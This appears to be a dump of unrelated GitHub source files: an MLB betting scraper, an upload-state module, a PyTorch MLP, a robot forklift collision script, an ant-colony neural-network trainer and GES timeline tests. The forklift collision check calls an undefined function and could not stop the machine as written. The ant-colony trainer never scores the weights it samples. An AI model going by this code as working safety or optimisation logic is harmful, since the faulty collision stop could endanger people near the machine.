len(pitch))):\r\n\t\t\tfangraph_pitch.iloc[j, 0] = find_name(pitch.at[j, \"Pitcher_Home\"], pitch.at[j, \"Team_Home\"], pitchers)\r\n\t\t\tfangraph_pitch.iloc[j, 1] = find_name(pitch.at[j, \"Pitcher_Away\"], pitch.at[j, \"Team_Away\"], pitchers)\r\n\r\n\r\n\t\trmv = []\r\n\t\t#Remove matches where the starting pitcher wasn't found in the database\r\n\t\tpitch_missing = np.where(np.logical_or(fangraph_pitch[\"Pitcher_Home\"] == \"None\", fangraph_pitch[\"Pitcher_Away\"] == \"None\"))[0]\r\n\t\tif len(pitch_missing) > 0:\r\n\t\t\tfor x in pitch_missing:\r\n\t\t\t\trmv.append(fangraph_pitch.at[x, \"ID\"])\t\r\n\r\n\t\trmv = list(set(list(rmv)))\t\r\n\r\n\t\tif len(rmv)\t> 0:\r\n\t\t\tindex = [x for x in np.arange(0, len(fangraph_bat)) if fangraph_bat.at[x, \"ID\"] not in rmv]\r\n\t\t\tfangraph_bat = fangraph_bat.iloc[index].reset_index(drop = True)\r\n\r\n\t\t\tindex = [x for x in np.arange(0, len(fangraph_pitch)) if fangraph_pitch.at[x, \"ID\"] not in rmv]\r\n\t\t\tfangraph_pitch = fangraph_pitch.iloc[index].reset_index(drop = True)\r\n\r\n\t\t\tindex = [x for x in np.arange(0, len(teams)) if teams.at[x, \"ID\"] not in rmv]\r\n\t\t\tteams = teams.iloc[index].reset_index(drop = True)\t\r\n\r\n\r\n\r\n\t\t#Keep track of how many batters couldn't be found in the database\t\r\n\r\n\t\tteams[\"Batters_Missing_Home\"] = 0\r\n\t\tteams[\"Batters_Missing_Away\"] = 0\r\n\r\n\t\tbat_missing = np.where(np.logical_or(fangraph_bat[\"Batter_Home\"] == \"None\", fangraph_bat[\"Batter_Away\"] == \"None\"))[0]\r\n\t\tif len(bat_missing) > 0:\r\n\r\n\t\t\tfor i in bat_missing:\r\n\r\n\t\t\t\ti_team = np.where(teams[\"ID\"] == fangraph_bat.at[i, \"ID\"])[0][0]\r\n\r\n\t\t\t\tif fangraph_bat.at[i, \"Batter_Home\"] == \"None\":\r\n\t\t\t\t\tteams.at[i_team, \"Batters_Missing_Home\"] += 1\r\n\r\n\t\t\t\tif fangraph_bat.at[i, \"Batter_Away\"] == \"None\":\r\n\t\t\t\t\tteams.at[i_team, \"Batters_Missing_Away\"] += 1\t\t\t\t\r\n\r\n\t\tteams[\"Batters_Missing_Total\"] = teams[\"Batters_Missing_Home\"] + teams[\"Batters_Missing_Away\"]\r\n\r\n\r\n\r\n\t\t#Match billet and teams\r\n\t\tbillet = pd.merge(billet, teams, how = \"inner\", on = [\"Team_Home\", \"Team_Away\"]).drop_duplicates([\"Team_Home\", \"Team_Away\"],keep= 'first')\r\n\r\n\t\t#Keep rosters\r\n\t\tindex = [x for x in np.arange(0, len(fangraph_bat)) if fangraph_bat.at[x, \"ID\"] in list(billet[\"ID\"])]\r\n\t\tfangraph_bat = fangraph_bat.iloc[index].reset_index(drop = True)\r\n\r\n\t\tindex = [x for x in np.arange(0, len(fangraph_pitch)) if fangraph_pitch.at[x, \"ID\"] in list(billet[\"ID\"])]\r\n\t\tfangraph_pitch = fangraph_pitch.iloc[index].reset_index(drop = True)\r\n\r\n\r\n\t\t#Add metrics\r\n\t\tbillet[\"Returns_Home\"] = billet[\"Factor_Home\"] - 1\r\n\t\tbillet[\"Returns_Away\"] = billet[\"Factor_Away\"] - 1\r\n\r\n\t\tbillet[\"Odds_Home\"] = 1 / billet[\"Factor_Home\"] \r\n\t\tbillet[\"Odds_Away\"] = 1 / billet[\"Factor_Away\"] \r\n\r\n\t\tbillet[\"OverOdds\"] = billet[\"Odds_Home\"] + billet[\"Odds_Away\"] - 1\r\n\r\n\t\tbillet[\"Odds_Home_FAIR\"] = billet[\"Odds_Home\"] / (billet[\"Odds_Home\"] + billet[\"Odds_Away\"])\r\n\t\tbillet[\"Odds_Away_FAIR\"] = billet[\"Odds_Away\"] / (billet[\"Odds_Home\"] + billet[\"Odds_Away\"])\t\r\n\r\n\t\t#Add date\r\n\t\tfangraph_bat[\"Date\"] = date\r\n\t\tfangraph_pitch[\"Date\"] = date\r\n\r\n\t\t#Save\r\n\t\tpath_save = self.paths[3] + \"/Predicted_Lineups/\" + \"Loto_Quebec_\" + date + \"/\"\r\n\t\tbillet.to_csv(path_save + \"Billet_Final.csv\", index = False)\r\n\t\tfangraph_bat.to_csv(path_save + 
\"Bat.csv\", index = False)\r\n\t\tfangraph_pitch.to_csv(path_save + \"Pitch.csv\", index = False)\r\n\r\n\t\tprint(billet)\r\n\r\n\r\n\r\n\r\n\tdef Assemble_Billet_Backtesting_Loto_Quebec(self):\r\n\r\n\t\tpath_dir = self.paths[3] + \"/Predicted_Lineups/\"\r\n\t\tpaths = [x for x in os.listdir(path_dir) if \"Loto_Quebec\" in x and \".csv\" not in x]\r\n\r\n\t\tif len(paths) == 0:\r\n\t\t\tsys.exit(\"Aucun billet...\")\r\n\r\n\t\tbillet = []\r\n\t\tbat = []\r\n\t\tpitch = []\r\n\r\n\t\tfor x in paths:\r\n\t\t\tif len(billet) == 0:\r\n\t\t\t\tbillet = pd.read_csv(path_dir + x + \"/Billet_Final.csv\")\r\n\t\t\telse:\r\n\t\t\t\tbillet = billet.append(pd.read_csv(path_dir + x + \"/Billet_Final.csv\"), ignore_index = True)\r\n\r\n\t\t\tif len(bat) == 0:\r\n\t\t\t\tbat = pd.read_csv(path_dir + x + \"/Bat.csv\")\r\n\t\t\telse:\r\n\t\t\t\tbat = bat.append(pd.read_csv(path_dir + x + \"/Bat.csv\"), ignore_index = True)\r\n\r\n\t\t\tif len(pitch) == 0:\r\n\t\t\t\tpitch = pd.read_csv(path_dir + x + \"/Pitch.csv\")\r\n\t\t\telse:\r\n\t\t\t\tpitch = pitch.append(pd.read_csv(path_dir + x + \"/Pitch.csv\"), ignore_index = True)\t\t\t\t\r\n\r\n\r\n\r\n\t\tpath_save = self.paths[3] + \"/Predicted_Lineups/\"\r\n\t\tbillet.to_csv(path_save + \"Historique_Loto_Quebec_Moneylines.csv\", index = False)\r\n\t\tbat.to_csv(path_save + \"Historique_Loto_Quebec_Bat.csv\", index = False)\r\n\t\tpitch.to_csv(path_save + \"Historique_Loto_Quebec_Pitch.csv\", index = False)\r\n\r\n\t\tprint(billet)\r\n\t\t\r\n\r\n\tdef Evaluer_Billet_Adj(self, n):\r\n\r\n\t\tdate = datetime.strftime(datetime.now(), \"%Y-%m-%d\")\r\n\t\tpath_check = self.paths[0].replace(\"Bat\", \"\") + \"Regression/\" + str(n) + \"/Betting_Fitted_Odds.csv\"\r\n\r\n\t\tif not path.exists(path_check):\r\n\t\t\tsys.exit(\"Missing file:\" + \"\\t\" + path_check)\r\n\r\n\t\tbillet = pd.read_csv(path_check)\r\n\r\n\t\tindex = np.where(billet[\"Date\"] == date)[0]\r\n\t\tif len(index) == 0:\r\n\t\t\tsys.exit(\"No bets placed on:\" + \"\\t\" + date)\r\n\r\n\t\tbillet = billet.iloc[index].reset_index(drop = True)\r\n\r\n\t\t#Check for live scores\r\n\t\turl = \"https://www.mlb.com/scores\" \r\n\r\n\t\theaders = {\r\n 'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36',\r\n \t}\r\n\r\n\t\tprint(\"Accessing \" + url + \"...\")\r\n\r\n\t\t#Obtain page data\r\n\t\thtml = requests.get(url, headers = headers).content\r\n\t\tsoup = BeautifulSoup(html)\r\n\r\n\t\ttables = soup.find_all(\"div\", {\"data-test-mlb\" : \"singleGameContainer\"})\r\n\t\tdata = pd.DataFrame(index = np.arange(0, len(tables)), columns = [\"Team_Home\", \"Team_Away\", \"Score_Home\", \"Score_Away\", \"Status\"])\r\n\t\tdata[\"Status\"] = \"Not_Final\"\r\n\r\n\t\tfor i in range(0, len(data)):\r\n\r\n\t\t\ttry:\r\n\r\n\t\t\t\tteams = tables[i].find_all(\"div\", {\"data-mlb-test\" : \"teamNameLabel\"})\r\n\r\n\t\t\t\tdata.at[i, \"Team_Away\"] = teams[0].text\r\n\t\t\t\tdata.at[i, \"Team_Home\"] = teams[1].text\r\n\r\n\t\t\t\tdata.at[i, \"Score_Away\"] = int(tables[i].find_all(\"td\", {\"data-col\" : \"0\", \"data-row\" : \"0\"})[0].text)\r\n\t\t\t\tdata.at[i, \"Score_Home\"] = int(tables[i].find_all(\"td\", {\"data-col\" : \"0\", \"data-row\" : \"1\"})[0].text)\r\n\r\n\t\t\t\ttables[i].find_all(\"div\", {\"data-mlb-test\" : \"gameStartTimesStateContainer\"})\r\n\r\n\t\t\t\tif \"Final\" in tables[i].find_all(\"div\", {\"data-mlb-test\" : \"gameStartTimesStateContainer\"})[0].text:\r\n\r\n\t\t\t\t\tdata.at[i, 
\"Status\"] = \"Final\"\r\n\r\n\r\n\r\n\t\t\texcept:\r\n\r\n\t\t\t\tcontinue\r\n\r\n\r\n\t\trmv = np.where(data[\"Score_Away\"].isnull())[0]\r\n\t\tif len(rmv) > 0:\r\n\t\t\tdata = data.drop(rmv).reset_index(drop = True)\r\n\r\n\t\trmv = np.where(data[\"Status\"] == \"Not_Final\")[0]\r\n\t\tif len(rmv) > 0:\r\n\t\t\tdata = data.drop(rmv).reset_index(drop = True)\t\t\r\n\r\n\t\tdata = self.Fix_Team_Names(data, \"City\")\r\n\r\n\t\t#Join tables\r\n\t\tbillet = pd.merge(billet, data, how = \"inner\", on = [\"Team_Home\", \"Team_Away\"])\r\n\t\tbillet[\"Win\"] = 1\r\n\r\n\t\tloss = np.where(billet[\"Score_Home\"] <= billet[\"Score_Away\"])[0]\r\n\t\tif len(loss) > 0:\r\n\t\t\tbillet.loc[loss, \"Win\"] = 0\r\n\r\n\t\t#Simulate 10$ bets\r\n\t\t#Arbitrage\r\n\t\tbillet[\"10$_Bets_Delta\"] = 10 * (billet[\"Factor_Home\"] * billet[\"Win\"] * billet[\"Linear_Home\"] + billet[\"Factor_Away\"] * (1 - billet[\"Win\"]) * billet[\"Linear_Away\"] - 1)\r\n\t\tbillet[\"10$_Bets_Cumsum\"] = np.cumsum(billet[\"10$_Bets_Delta\"])\r\n\t\tbillet[\"Arbitrage_Returns\"] = billet[\"10$_Bets_Cumsum\"] / (10 * (1 + np.arange(0, len(billet))))\r\n\r\n\t\t#Kelly\r\n\t\tmoney = len(billet) * 10\r\n\t\tscale = billet[[\"Kelly_Home\", \"Kelly_Away\"]].sum().sum()\r\n\r\n\t\tbillet.loc[:, [\"Kelly_Home\", \"Kelly_Away\"]] = billet.loc[:, [\"Kelly_Home\", \"Kelly_Away\"]] / scale\r\n\r\n\t\tbillet[\"Kelly_Bets_Delta\"] = money * (billet[\"Factor_Home\"] * billet[\"Win\"] * billet[\"Kelly_Home\"] + billet[\"Factor_Away\"] * (1 - billet[\"Win\"]) * billet[\"Kelly_Away\"] - (billet[\"Kelly_Home\"] + billet[\"Kelly_Away\"]))\r\n\t\tbillet[\"Kelly_Bets_Cumsum\"] = np.cumsum(billet[\"Kelly_Bets_Delta\"])\r\n\t\tbillet[\"Kelly_Returns\"] = billet[\"Kelly_Bets_Cumsum\"] / (10 * (1 + np.arange(0, len(billet))))\r\n\r\n\t\tprint(\"####################################################################################\")\r\n\t\tprint(\"####################################################################################\")\r\n\t\tprint(\"###################\" + \"\\t\" + \"\\t\" + \"BETTING RESULTS\" + \"\\t\" + \"\\t\" + \"############################\")\r\n\t\tprint(\"###################\" + \"\\t\" + \"\\t\" + date + \"\\t\" + \"\\t\" + \"############################\")\r\n\t\tprint(\"####################################################################################\")\r\n\t\tprint(\"####################################################################################\")\r\n\t\tprint(\"\")\r\n\t\tprint(\"\")\r\n\t\tprint(\"\")\r\n\t\tprint(\"\")\r\n\r\n\t\tprint(billet[[\"Team_Home\", \"Team_Away\", \"10$_Bets_Cumsum\", \"Arbitrage_Returns\", \"Kelly_Bets_Cumsum\", \"Kelly_Returns\"]])\r\n\r\n\t\tbillet.to_csv(self.paths[3] + \"/Predicted_Lineups/Loto_Quebec_Gains_today.csv\")\r\n\r\n\r\n\r\n\tdef Reddit_Print_Billet_Final(self, n):\r\n\r\n\t\tdate = datetime.strftime(datetime.now(), \"%Y-%m-%d\")\r\n\t\tpath_check = self.paths[0].replace(\"Bat\", \"\") + \"Regression/\" + str(n) + \"/Betting_Fitted_Odds.csv\"\r\n\r\n\t\tif not path.exists(path_check):\r\n\t\t\tsys.exit(\"Missing file:\" + \"\\t\" + path_check)\r\n\r\n\t\tbillet = pd.read_csv(path_check)\r\n\t\tkeep = np.where(billet[\"Date\"] == date)[0]\r\n\t\tif len(keep) == 0:\r\n\t\t\tsys.exit(\"No bets made on that day.\")\r\n\r\n\t\tbillet = billet.iloc[keep].reset_index(drop = True)\r\n\r\n\t\tout = billet[[\"Team_Home\", \"Team_Away\", \"Factor_Home\", \"Factor_Away\"]].copy()\r\n\t\tout.columns = [\"Team_Home\", \"Team_Away\", \"R_LotoQ_Home\", 
\"R_LotoQ_Away\"]\r\n\t\tout[\"R_Model_Home\"] = (1 / billet[\"Odds\"]).round(2)\r\n\t\tout[\"R_Model_Away\"] = (1 / (1 - billet[\"Odds\"])).round(2)\r\n\t\tout[\"Bet_on\"] = out[\"Team_Home\"]\r\n\t\tout[\"R+\"] = out[\"R_LotoQ_Home\"] - out[\"R_Model_Home\"]\r\n\r\n\t\tbet_away = np.where(billet[\"Linear_Away\"] == 1)[0]\r\n\t\tif len(bet_away) > 0:\r\n\t\t\tout.loc[bet_away, \"Bet_on\"] = out.loc[bet_away, \"Team_Away\"].copy()\r\n\t\t\tout.loc[bet_away, \"R+\"] = out.loc[bet_away, \"R_LotoQ_Away\"].copy() - out.loc[bet_away, \"R_Model_Away\"].copy()\r\n\r\n\t\tout[\"NaN\"] = billet[\"Batters_Missing_Total\"]\r\n\t\tout[\"Cf\"] = \"None\"\r\n\r\n\t\tfor i in range(0, len(out)):\r\n\t\t\tif billet.at[i, \"Lineup_Home\"] == \"is-confirmed\" and billet.at[i, \"Lineup_Away\"] == \"is-confirmed\":\r\n\t\t\t\tout.at[i, \"Cf\"] = \"Both\"\r\n\t\t\telif billet.at[i, \"Lineup_Home\"] == \"is-confirmed\":\r\n\t\t\t\tout.at[i, \"Cf\"] = \"Home\"\r\n\t\t\telif billet.at[i, \"Lineup_Away\"] == \"is-confirmed\":\r\n\t\t\t\tout.at[i, \"Cf\"] = \"Away\"\t\t\t\t\r\n\r\n\t\tprint(out)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"frankfredj/MLB_Betting","sub_path":"0_Scrapper.PY.py","file_name":"0_Scrapper.PY.py","file_ext":"py","file_size_in_byte":57199,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"22062765987","text":"from enum import Enum\r\nimport shutil\r\nimport os\r\nimport ctypes\r\nimport itertools\r\nimport os\r\nimport string\r\nimport platform\r\n\r\ndef check_disk_space(path):\r\n \r\n \"\"\" chech the path space total,used and free spaces\r\n arguments : path (directory)\r\n return : dectionary includes the statistices \r\n \r\n \"\"\"\r\n # statistices variable\r\n stat = 0 \r\n \r\n try: \r\n # extracte the statistices of the directory \r\n stat = shutil.disk_usage(path) \r\n except:\r\n print(\"Path Error --- check_disk_space()\")\r\n print(\"the returned statistices is relevent to the user dirctory \") \r\n try:\r\n # extracte the statistices of the user directory\r\n path = os.path.expanduser('~')\r\n stat = shutil.disk_usage(path) \r\n except:\r\n print(\"Error \") \r\n return {\"total\":stat[0],\"used\":stat[1],\"free\":stat[2]}\r\n\r\n\r\n\r\nclass uploading_data():\r\n DATA = list()\r\n \r\nupload_data = uploading_data.DATA \r\n\r\n\r\ndef get_available_drives():\r\n if 'Windows' not in platform.system():\r\n return []\r\n drive_bitmask = ctypes.cdll.kernel32.GetLogicalDrives()\r\n return list(itertools.compress(string.ascii_uppercase,\r\n map(lambda x:ord(x) - ord('0'), bin(drive_bitmask)[:1:-1])))\r\n\r\n# Enum type to express the Connection status\r\nclass Connection_Status(Enum):\r\n CONNECTED = True\r\n NOT_CONNECTED = False\r\n\r\n# Enum type to express the Connection status\r\nclass Connection_Status_IP(Enum):\r\n CONNECTED = True\r\n NOT_CONNECTED = False\r\n \r\n# Enum type to express the program status\r\nclass program_States(Enum):\r\n IDLE = 0\r\n CHECK_CONNECTION = 1\r\n UPLOAD = 2\r\n VALIDATION = 3\r\n DELETE = 4\r\n\r\nInternet_Connection_Status = None\r\nInternet_Connection_Status_IP = None\r\n\r\nProgram_State = program_States.IDLE\r\nFiles = []\r\n\r\n\r\n \r\n\r\nclass Uploading_Folder_Status(Enum):\r\n FOLDER_UPLOADING_DONE = True\r\n FOLDER_UPLOADING_NOT_DONE = False\r\nclass Uploading_File_Status(Enum):\r\n FILE_UPLOADING_DONE = True\r\n FILE_UPLOADING_NOT_DONE = False\r\n \r\nUploading_Folder_state = Uploading_Folder_Status.FOLDER_UPLOADING_DONE\r\nUploading_file_state = 
Uploading_File_Status.FILE_UPLOADING_DONE","repo_name":"Abdullahsaeed24/CarSync","sub_path":"CarSync/Project Script/script0212/shared_data.py","file_name":"shared_data.py","file_ext":"py","file_size_in_byte":2203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"24206625959","text":"from argparse import ArgumentParser\n\nimport torch\nimport torch.nn as nn\n\n\nclass MLP(nn.Module):\n    def __init__(self, dropout_prob: float = 0.2, in_features: int = 28 * 28,\n                 out_features: int = 10, hidden_dim: int = 1000,\n                 **kwargs\n                 ):\n        super().__init__()\n\n        self.dropout_prob = dropout_prob\n        self.in_features = in_features\n        self.out_features = out_features\n        self.hidden_dim = hidden_dim\n\n        self.c_d1 = nn.Linear(in_features=self.in_features,\n                              out_features=self.hidden_dim)\n        self.c_d1_bn = nn.BatchNorm1d(self.hidden_dim)\n        self.c_d1_drop = nn.Dropout(self.dropout_prob)\n\n        self.c_d2 = nn.Linear(in_features=self.hidden_dim,\n                              out_features=self.out_features)\n\n    def forward(self, x):\n        x = self.c_d1(x.view(x.size(0), -1))\n        x = torch.tanh(x)\n        x = self.c_d1_bn(x)\n        x = self.c_d1_drop(x)\n        x = self.c_d2(x)\n        return x\n\n    @staticmethod\n    def add_model_specific_args(parent_parser, root_dir): # pragma: no-cover\n        \"\"\"\n        Define parameters that only apply to this model\n        \"\"\"\n        parser = ArgumentParser(parents=[parent_parser], add_help=False)\n\n        # network params\n        parser.add_argument('--in_features', default=32 * 32 * 3, type=int)\n        parser.add_argument('--out_features', default=10, type=int)\n        parser.add_argument('--hidden_dim', default=512 * 16, type=int)\n        parser.add_argument('--dropout_prob', default=0.2, type=float)\n        return parser\n","repo_name":"mo-arvan/pytorch-lightning-template","sub_path":"mlp.py","file_name":"mlp.py","file_ext":"py","file_size_in_byte":1607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2673649399","text":"import serial  # the pyserial package imports as 'serial', matching serial.Serial below\nimport pyRobot\nimport cv2\nimport numpy as np\nimport winsound\n\n# Connect to the microcontroller or controller\nser = serial.Serial('COM3', 9600)\n\n# Initialize the forklift object\nforklift = pyRobot.Forklift()\n\n# Initialize the cameras\ncamera1 = cv2.VideoCapture(0)\ncamera2 = cv2.VideoCapture(1)\ncamera3 = cv2.VideoCapture(2)\ncamera4 = cv2.VideoCapture(3)\n\n# Set the collision distance threshold\ncollision_distance = 0.5 # meters\n\nwhile True:\n    # Get the images from the cameras\n    ret1, frame1 = camera1.read()\n    ret2, frame2 = camera2.read()\n    ret3, frame3 = camera3.read()\n    ret4, frame4 = camera4.read()\n\n    frames = [frame1, frame2, frame3, frame4]\n    for frame in frames:\n        # Convert the image to grayscale\n        gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n        # Detect edges in the image\n        edges = cv2.Canny(gray, 50, 150)\n\n        # Find contours in the image\n        _, contours, _ = cv2.findContours(edges, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n\n        # Iterate over the contours\n        for contour in contours:\n            # Get the moments of the contour\n            moments = cv2.moments(contour)\n\n            if moments[\"m00\"] != 0:\n                # Get the centroid of the contour\n                x = int(moments[\"m10\"] / moments[\"m00\"])\n                y = int(moments[\"m01\"] / moments[\"m00\"])\n\n                # Calculate the distance from the centroid to the forklift\n                distance = calculate_distance(x, y)\n\n                # Check if the distance is less than the collision distance threshold\n                if distance < collision_distance:\n                    # Play a warning beep sound\n                    winsound.Beep(2000, 500)\n                    # Stop the forklift\n                    forklift.stop()\n                    
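# NOTE (assumed environment): with pyserial on Python 3, write() expects bytes,\n                    # e.g. ser.write(b'S'); passing a plain str raises TypeError\n                    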
ser.write('S')\n break\n # Move the forklift forwards\n forklift.move_forwards()\n ser.write('F')\n\n# Release the cameras\ncamera1.release()\ncamera2.release()\ncamera3.release()\ncamera4.release()\n","repo_name":"Tatendamarshall/Robot-Forklift","sub_path":"Forklift.py","file_name":"Forklift.py","file_ext":"py","file_size_in_byte":2038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9591829150","text":"##Importing Packages\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom sklearn.metrics import accuracy_score\r\nimport matplotlib.pyplot as plt\r\nplt.style.use('dark_background')\r\n\r\n##Defining the ACO_NN class\r\nclass ACONN:\r\n #init_Method\r\n def __init__(self, input_layer_size, hidden_layer_size, output_layer_size):\r\n self.input_layer_size = input_layer_size\r\n self.hidden_layer_size = hidden_layer_size\r\n self.output_layer_size = output_layer_size\r\n self.W1 = np.random.randn(self.input_layer_size, self.hidden_layer_size)\r\n self.W2 = np.random.randn(self.hidden_layer_size, self.output_layer_size)\r\n \r\n ##Forward Propagation\r\n def forward_Propagation(self, X):\r\n self.z1 = np.dot(X, self.W1)\r\n self.a1 = self.sigmoid(self.z1)\r\n self.z2 = np.dot(self.a1, self.W2)\r\n self.y_hat = self.sigmoid(self.z2)\r\n return self.y_hat\r\n \r\n #Sigmoid Activation Function\r\n def sigmoid(self, z):\r\n return 1 / (1 + np.exp(-z))\r\n\r\n #Fitness Function / Cost Function\r\n def cost_function(self, X, y):\r\n self.y_hat = self.forward_Propagation(X)\r\n J = 0.5 * np.sum((y - self.y_hat) ** 2)\r\n return J\r\n\r\n def ant_colony_optimization(self, X, y, max_iterations, num_ants, alpha, beta, rho, q):\r\n # Initialize the list to store the cost over generations\r\n cost_history_run = []\r\n pheromone = np.ones((self.input_layer_size, self.hidden_layer_size, self.output_layer_size))\r\n for i in range(max_iterations):\r\n ants = []\r\n for j in range(num_ants):\r\n ant = {}\r\n ant['path'] = []\r\n ant['pheromone'] = []\r\n ant['cost'] = 0\r\n ant['W1'] = np.zeros((self.input_layer_size, self.hidden_layer_size))\r\n ant['W2'] = np.zeros((self.hidden_layer_size, self.output_layer_size))\r\n ant['path'].append(np.random.randint(self.input_layer_size))\r\n ant['path'].append(np.random.randint(self.hidden_layer_size))\r\n for k in range(self.output_layer_size):\r\n ant['path'].append(np.random.randint(self.hidden_layer_size))\r\n for k in range(self.input_layer_size):\r\n for l in range(self.hidden_layer_size):\r\n ant['pheromone'].append(pheromone[k][l][0])\r\n for k in range(self.hidden_layer_size):\r\n for l in range(self.output_layer_size):\r\n ant['pheromone'].append(pheromone[0][k][l])\r\n for k in range(self.input_layer_size):\r\n for l in range(self.hidden_layer_size):\r\n if np.random.rand() < ant['pheromone'][k * self.hidden_layer_size + l]:\r\n ant['W1'][k][l] = np.random.randn()\r\n for k in range(self.hidden_layer_size):\r\n for l in range(self.output_layer_size):\r\n if np.random.rand() < ant['pheromone'][self.input_layer_size * self.hidden_layer_size + k * self.output_layer_size + l]:\r\n ant['W2'][k][l] = np.random.randn()\r\n ant['cost'] = self.cost_function(X, y)\r\n ants.append(ant)\r\n ants = sorted(ants, key=lambda x: x['cost'])\r\n best_ant = ants[0]\r\n for k in range(self.input_layer_size):\r\n for l in range(self.hidden_layer_size):\r\n pheromone[k][l][0] = (1 - rho) * pheromone[k][l][0] + 
q / best_ant['cost'] * (best_ant['W1'][k][l] != 0)\r\n            for k in range(self.hidden_layer_size):\r\n                for l in range(self.output_layer_size):\r\n                    pheromone[0][k][l] = (1 - rho) * pheromone[0][k][l] + q / best_ant['cost'] * (best_ant['W2'][k][l] != 0)\r\n            self.W1 = best_ant['W1']\r\n            self.W2 = best_ant['W2']\r\n            print(f\"Generation {i+1}, Best Cost: {best_ant['cost']}\")\r\n            cost_history_run.append(best_ant['cost'])\r\n        plt.plot(cost_history_run)\r\n        plt.xlabel('Generation')\r\n        plt.ylabel('Loss')\r\n        plt.show()\r\n    \r\n    def train(self, X, y, max_iterations, num_ants, alpha, beta, rho, q):\r\n        self.ant_colony_optimization(X, y, max_iterations, num_ants, alpha, beta, rho, q)\r\n\r\n    def predict(self, X):\r\n        y_hat = self.forward_Propagation(X)\r\n        predictions = np.round(y_hat)\r\n        return predictions\r\n    \r\n##Loading the dataset\r\ndata = pd.read_csv(\"Bank_Personal_Loan_Modelling.csv\")\r\nx = data.drop(['Personal Loan','ID'],axis=1).values\r\ny = data['Personal Loan'].values\r\n\r\n##Train Test Split\r\nx_train,x_test,y_train,y_test = train_test_split(x,y,test_size=0.3,random_state=9)\r\n\r\n##Data Pre-Processing\r\nSC = StandardScaler()\r\nx_train = SC.fit_transform(x_train)\r\nx_test = SC.transform(x_test) #reuse the training-set fit so test statistics do not leak\r\n\r\n##Creating the Instance For ACO_NN class\r\naconn = ACONN(input_layer_size=x_train.shape[1], hidden_layer_size=4, output_layer_size=1)\r\n\r\n## Training the network\r\naconn.train(x_train, y_train, max_iterations=10, num_ants=10, alpha=1, beta=1, rho=0.5, q=1)\r\n\r\n## Predicting the Values\r\ny_pred = aconn.predict(x_test)\r\naccuracy = accuracy_score(y_test, y_pred)\r\nprint('Accuracy:', accuracy)","repo_name":"MuthuPalaniappan925/Intelligent-Neural-Network-Optimization-with-Evolutionary-Algorithms","sub_path":"Ant Colony Optimization with ANN/ACO_NN.py","file_name":"ACO_NN.py","file_ext":"py","file_size_in_byte":5381,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"7631300475","text":"import gi\n\ngi.require_version(\"Gst\", \"1.0\")\ngi.require_version(\"GES\", \"1.0\")\n\nfrom gi.repository import Gst # noqa\nfrom gi.repository import GES # noqa\nimport unittest # noqa\nfrom unittest import mock\n\nfrom .common import create_main_loop\nfrom .common import create_project\nfrom .common import GESSimpleTimelineTest # noqa\n\nGst.init(None)\nGES.init()\n\n\nclass TestTimeline(unittest.TestCase):\n\n    def test_signals_not_emitted_when_loading(self):\n        mainloop = create_main_loop()\n        timeline = create_project(with_group=True, saved=True)\n\n        # Reload the project, check the group.\n        project = GES.Project.new(uri=timeline.get_asset().props.uri)\n\n        loaded_called = False\n        def loaded(unused_project, unused_timeline):\n            nonlocal loaded_called\n            loaded_called = True\n            mainloop.quit()\n        project.connect(\"loaded\", loaded)\n\n        timeline = project.extract()\n\n        signals = [\"layer-added\", \"group-added\", \"track-added\"]\n        handle = mock.Mock()\n        for signal in signals:\n            timeline.connect(signal, handle)\n\n        mainloop.run()\n        self.assertTrue(loaded_called)\n        handle.assert_not_called()\n\nclass TestEditing(GESSimpleTimelineTest):\n\n    def test_transition_disappears_when_moving_to_another_layer(self):\n        self.timeline.props.auto_transition = True\n        unused_clip1 = self.add_clip(0, 0, 100)\n        clip2 = self.add_clip(50, 0, 100)\n        self.assertEquals(len(self.layer.get_clips()), 4)\n\n        layer2 = self.timeline.append_layer()\n        clip2.edit([], layer2.get_priority(), GES.EditMode.EDIT_NORMAL, GES.Edge.EDGE_NONE, clip2.props.start)\n        
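# note: assertEquals, used throughout this file, is a deprecated unittest alias\n        # of assertEqual; both pass, but assertEqual avoids DeprecationWarning\n        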
self.assertEquals(len(self.layer.get_clips()), 1)\n        self.assertEquals(len(layer2.get_clips()), 1)\n\n    def test_transition_moves_when_rippling_to_another_layer(self):\n        self.timeline.props.auto_transition = True\n        clip1 = self.add_clip(0, 0, 100)\n        clip2 = self.add_clip(50, 0, 100)\n        all_clips = self.layer.get_clips()\n        self.assertEquals(len(all_clips), 4)\n\n        layer2 = self.timeline.append_layer()\n        clip1.edit([], layer2.get_priority(), GES.EditMode.EDIT_RIPPLE, GES.Edge.EDGE_NONE, clip1.props.start)\n        self.assertEquals(self.layer.get_clips(), [])\n        self.assertEquals(set(layer2.get_clips()), set(all_clips))\n\n    def test_transition_rippling_after_next_clip_stays(self):\n        self.timeline.props.auto_transition = True\n        clip1 = self.add_clip(0, 0, 100)\n        clip2 = self.add_clip(50, 0, 100)\n        all_clips = self.layer.get_clips()\n        self.assertEquals(len(all_clips), 4)\n\n        clip1.edit([], self.layer.get_priority(), GES.EditMode.EDIT_RIPPLE, GES.Edge.EDGE_NONE, clip2.props.start + 1)\n        self.assertEquals(set(self.layer.get_clips()), set(all_clips))\n\n    def test_transition_rippling_over_does_not_create_another_transition(self):\n        self.timeline.props.auto_transition = True\n\n        clip1 = self.add_clip(0, 0, 17 * Gst.SECOND)\n        clip2 = clip1.split(7.0 * Gst.SECOND)\n        # Make a transition between the two clips\n        clip1.edit([], self.layer.get_priority(), GES.EditMode.EDIT_NORMAL, GES.Edge.EDGE_NONE, 4.5 * Gst.SECOND)\n\n        # Ripple clip1 and check that the transitions always stay the same\n        all_clips = self.layer.get_clips()\n        